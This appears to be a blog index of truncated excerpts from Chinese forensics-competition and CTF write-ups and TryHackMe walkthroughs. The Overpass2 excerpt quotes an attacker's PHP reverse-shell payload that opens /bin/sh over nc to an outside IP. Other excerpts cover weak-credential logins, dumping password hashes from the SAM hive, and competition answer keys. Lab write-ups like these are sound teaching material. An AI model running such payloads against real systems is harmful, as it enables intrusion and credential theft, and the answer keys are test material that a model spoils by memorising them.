2025龙信考核比武
2025龙信考核比武很奇妙的一次体验,主办方提供的检材在比赛当天凌晨发现出问题了,临时又进行更换,好在睡得晚及时重新下载了
本身题的难度不是很高,但不知道为啥做的时候脑子好像短路了一样,在这里写个复盘 仅代表个人观点 正确答案以官方公布为准 欢迎师傅们来交流
镜像链接:https://pan.baidu.com/s/1a9bQ4S5Soz5L6nSvkmiPIg?pwd=6j6r
容器密码:MjAyNeWKoOayuQ==
1.分析手机备份,该机主的qq号为1203494553
2.分析手机备份文件,该机主的微信号为?(标准格式:abcdefg)wxid_oa8u5syonjcp22
这里应该写的是微信内部id
3.请问该手机机主微信共有_____个现有好友?(标准格式:12)16
4.请分析机主的银行卡卡号是多少?(标准格式:按照实际值填写)6231276371853671344
这里使用龙信的手机分析可以直接分析出来
当然找数据库也是可以的 路径是data/com.hallo330.app1.YongYou/ab826feedee08f7a50ea89cc830 ...
2024冀信杯决赛
2024冀信杯决赛本次比赛 我们SeeU-Sec是第一
在这里记录几道比较有意思的题目 赛制分成三部分:安全运维、应急响应、综合渗透
渗透部分还是狠狠的败北了 只做了一个后台的密码爆破和sql报错注入 分数的大头还是在应急和安全运维部分
日志和注册表分析题目具体是什么记得不是很清楚了 大概意思好像是存在一个攻击者创建后门用户的行为 需要找到创建的这个用户和密码
首先给到的是一个evtx的windows日志文件 直接用windows默认的日志工具打开也行 但是不是很方便检索
可以先用Win_logs_parse_tool工具把evtx文件提取成xml文件和html文件 转化之后如图
根据windows的事件ID 4720对应的事件是windows创建用户的 直接搜索这个id 找到对应的事件记录 可以在事件详情中找到创建的账户名称 是2Ha0c2K34ruiop$
使用这个用户名可以解压附件中的SAM.zip 注册表文件压缩包 里面有三个注册表文件
我们通过注册表可以获取windows用户密码的哈希值 但是不能直接拿到明文
只需要sam和system这两个注册表 利用mimika ...
DASCTF 2024最后一战 | Misc
DASCTF 2024最后一战 | Misc弹道偏下上来打开流量包就看到有加密的SMB3流量
大概率是需要咱们爆破NTLMv2哈希 先用脚本提取一下 只有一个用户的哈希
share::MicrosoftAccount:0a08d9f15eb53eea:a20aec951c89961f2e81bf0917d8990a:0101000000000000cfebd19d3636db01022ada3cfbb5b30e0000000002001e004400450053004b0054004f0050002d004800440039004b0051004e00540001001e004400450053004b0054004f0050002d004800440039004b0051004e00540004001e004400450053004b0054004f0050002d004800440039004b0051004e00540003001e004400450053004b0054004f0050002d004800440039004b0051004e00540007000800cf ...
w3nx1z1的2024年度个人总结
2024年年度总结时间过得真快 距离上一次写年度总结已经过去了一年的时间 上次写的时候自己还是一个萌新,此时已经是个快退役的老赛棍了。
今年是非常特殊的一年,记录了我和社团还有我的网安学习道路上的很多第一次、很多难忘的时刻。
今年真得是参加了很多比赛,不管是线上的还是线下的,拿了不少奖,其中很多是弥补了去年的遗憾吧。
正常的警校生活可能只能允许我在有限的紧张的假期时间去探索祖国的大好河山,因此非常感谢当初的自己可以选择学习网安这条道路,在同学们只能在苦逼的校园中度日的时候,我还能一点点的去点亮地图哈哈哈,希望新的一年里可以去更多的地方。
下面一点点来回顾这一年的时光。
2024.1还记得今年过年挺晚的 因为一些原因,刚放假就被拉去练车,当时还因为考科二没打成獬豸杯,失去一次拿奖机会哈哈哈
月底还打了西湖论剑,很遗憾的一次战斗,差一题就进了,马上这届西湖还有半个多月就要开打了,希望25年可以打到线下,真的想再去一次杭州好吧!
2024.4铁三初赛记得是三月底打的,和20届的老学长们最后一次线下并肩作战,初赛还好,记得打到了前几名。
没想到4月底的半决赛拉了,一个学长因为要考公没来,另一 ...
Offensive Pentesting-Overpass2
Offensive Pentesting-Overpass2这个room主要是一个流量分析溯源取证的 难度相对来说比较简单 同时分析完攻击行为之后 我们可以利用流量包中的记录来进行攻击靶机
Forensics - Analyse the PCAP下载下来附件是一个流量包 直接追踪tcp流
第一个流中 上传了一个反弹shell马
他们用来上传反向 shell 的页面的 URL 是什么?
/development
攻击者使用什么有效负载来获取访问权限?
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
第三个流中就是一个反弹到shell后执行命令的记录
也能看到使用su james命令登陆到了james用户
攻击者使用什么密码来获取权限?
whenevernoteartinstant
往后看到执行了sudo -l命令查看了当前james用户的sudo权限规则 查看哪些命令可以被执行
...
Offensive Pentesting-Alfred
Offensive Pentesting-AlfredExploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
利用 Jenkins 获取初始 shell,然后通过利用 Windows 身份验证令牌来提升您的权限。
Initial Access先来扫目录和端口
nmap -T4 -sC -sV -Pn 10.10.118.134
可以看到tcp协议开放的端口一共有3个
How many ports are open? (TCP only)
3
下面来访问一下web服务 80端口的没啥用 直接来看8080端口 上来是一个登录框
先直接试一下弱口令:admin:admin 结果直接登上去了
What is the username and password for the login panel? (in the format username:password)
admin:admin
获取user的 ...
Offensive Pentesting-Steel Mountain
Offensive Pentesting-Steel MountainHack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.
Introductionn this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.
If you don't have the right security tools and environment, deplo ...
2024国城杯Misc wp
2024国城杯Misc wp取证说了取证有四部分 先取证大师+火眼整一下
先看到桌面有个流量包
提出来 发现藏了一张jpg图片
提出来 放010看一下 有一串base64
解一下 提示oursecret
使用oursecret来解密 提出来一个hidden.txt
提示QQ空间 正好上面流量是QQ的OICQ协议流量 发现直接给了一个QQ号
搜索一下 在QQ空间说说中找到密文
直接aes-ecb解 拿到flag1
在压缩文件中找到一个flag4
可以直接解压 exe放沙箱里面分析一下
用pyinstxtractor解包 找到关键的pyc文件
在线反编译 拿到加密代码
写出解密代码
def xor_decrypt(encrypted_data, key):
decrypted_data = bytearray()
for i in range(len(encrypted_data)):
decrypted_data.append(encrypted_data[i] ^ key[i % len(key)])
return ...
2024第一届数证杯决赛——个人赛
数证杯决赛——个人赛容器挂载密码:
4zL!$WpRkmANv@XFQ#7HdEyU&GpoTb56YZ^Jq83!Wr(tqA%XsPB7f@CY1xRmKH9#Le*WVG9NuvT$kJ2@7b64Tp(FLM#zqRY8Hv%!KU^9C&YXL*powq87Hr
检材下载链接:
链接:https://pan.baidu.com/s/12ZZnIfc7ifYoTNi9H8ZqsA?pwd=5g81
提取码:5g81
计算机部分1. [填空题]计算机中曾挂载的Bitlocker加密分区的恢复密钥后6位为?(答案格式:6位数字) (1分)
700755
2. [填空题]请写出曾远程连接过该计算机的IP;(答案格式:6.6.6.6) (1分)
192.168.50.227
3. [填空题]计算机中曾挂载的vhd非加密分区驱动器号为?(答案格式:大写,如D) (1分)
M
发现计算机中一共有两个vhd虚拟磁盘
仿真起计算机 尝试挂载一下两个虚拟磁盘 发现这个996600.vhd可以直接挂载 挂载后盘符是M
而另一个338899挂载上是被bitl ...
2024第一届数证杯初赛wp(计算机、手机、流量分析部分)
2024第一届数证杯(计算机、手机、流量分析部分)计算机取证1.对计算机镜像进行分析,计算该镜像中ESP分区的SM3值后8位为?(答案格式:大写字母与数字组合,如:D23DDF44) (2分)
ai搜一下ESP分区的特征
找到并计算出SM3值
后八位为
BDBE1073
2.对计算机镜像进行分析,该操作系统超管账户最后一次注销时间为?(时区为UTC+08:00)(答案格式如:1970-01-01 00:00:00) (2分)
2024-10-25 22:57:32
3.对计算机镜像进行分析,该操作系统超管账户有记录的登录次数为?(填写数字,答案格式如:1234) (2分)
24
4.对计算机镜像进行分析,该操作系统设置的账户密码最长存留期为多少天?(填写数字,答案格式如:1234) (2分)
42
5.对计算机镜像进行分析,该操作系统安装的数据擦除软件的版本为?(答案格式:1.23) (2分)
5.86
6.对计算机镜像进行分析,该操作系统接入过一名称为“Realtek USB Disk autorun USB Device”的USB设备,其接入时分配 ...